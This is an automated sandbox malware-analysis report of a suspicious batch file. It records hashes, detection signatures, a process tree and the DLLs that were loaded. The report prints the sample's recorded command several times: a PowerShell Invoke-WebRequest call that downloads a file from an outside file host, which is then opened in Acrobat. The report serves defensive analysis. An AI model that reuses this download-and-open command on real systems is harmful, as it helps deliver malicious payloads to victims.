Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sHCznAai4a.bat

Overview

General Information

Sample name:sHCznAai4a.bat
renamed because original name is a hash value
Original sample name:b91d2640c2972bbbe94014406a07695a.bat
Analysis ID:1584191
MD5:b91d2640c2972bbbe94014406a07695a
SHA1:af9c7f23facca63c6ce39ff9dfeb5f495fd9abd4
SHA256:3ded7af0f272b3d1adb6372e1729cfb6a2b77f548b17b8d80c451fe42dfdf57d
Tags:batuser-abuse_ch
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Opens network shares
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

  • System is w10x64
  • cmd.exe (PID: 7148 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\sHCznAai4a.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6380 cmdline: cmd /c "C:\Users\user\Desktop\sHCznAai4a.bat" min MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1772 cmdline: powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • Acrobat.exe (PID: 1740 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\u43g9t.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 2916 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7320 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1620,i,284349947158003395,7923369170220730022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 4820 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf", CommandLine: powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c "C:\Users\user\Desktop\sHCznAai4a.bat" min , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6380, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf", ProcessId: 1772, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf", CommandLine: powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c "C:\Users\user\Desktop\sHCznAai4a.bat" min , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6380, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf", ProcessId: 1772, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf", CommandLine: powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c "C:\Users\user\Desktop\sHCznAai4a.bat" min , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6380, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf", ProcessId: 1772, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4820, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.3% probability
Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: svchost.exe, 00000007.00000002.2908940152.0000016F4A600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000007.00000003.1721905010.0000016F4A818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000007.00000003.1721905010.0000016F4A818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000007.00000003.1721905010.0000016F4A818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000007.00000003.1721905010.0000016F4A84D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.drString found in binary or memory: http://x1.i.lencr.org/
Source: sHCznAai4a.batString found in binary or memory: https://files.catbox.moe/u43g9t.pdf
Source: svchost.exe, 00000007.00000003.1721905010.0000016F4A8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000007.00000003.1721905010.0000016F4A8C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000007.00000003.1721905010.0000016F4A8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: classification engineClassification label: mal52.spyw.winBAT@24/57@0/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\u43g9t.pdfJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zbbpe3e.0in.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\sHCznAai4a.bat" "
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\cmd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\PayloadJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\sHCznAai4a.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "C:\Users\user\Desktop\sHCznAai4a.bat" min
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\u43g9t.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1620,i,284349947158003395,7923369170220730022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "C:\Users\user\Desktop\sHCznAai4a.bat" min Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://files.catbox.moe/u43g9t.pdf -o u43g9t.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\u43g9t.pdf"Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1620,i,284349947158003395,7923369170220730022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: networkexplorer.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
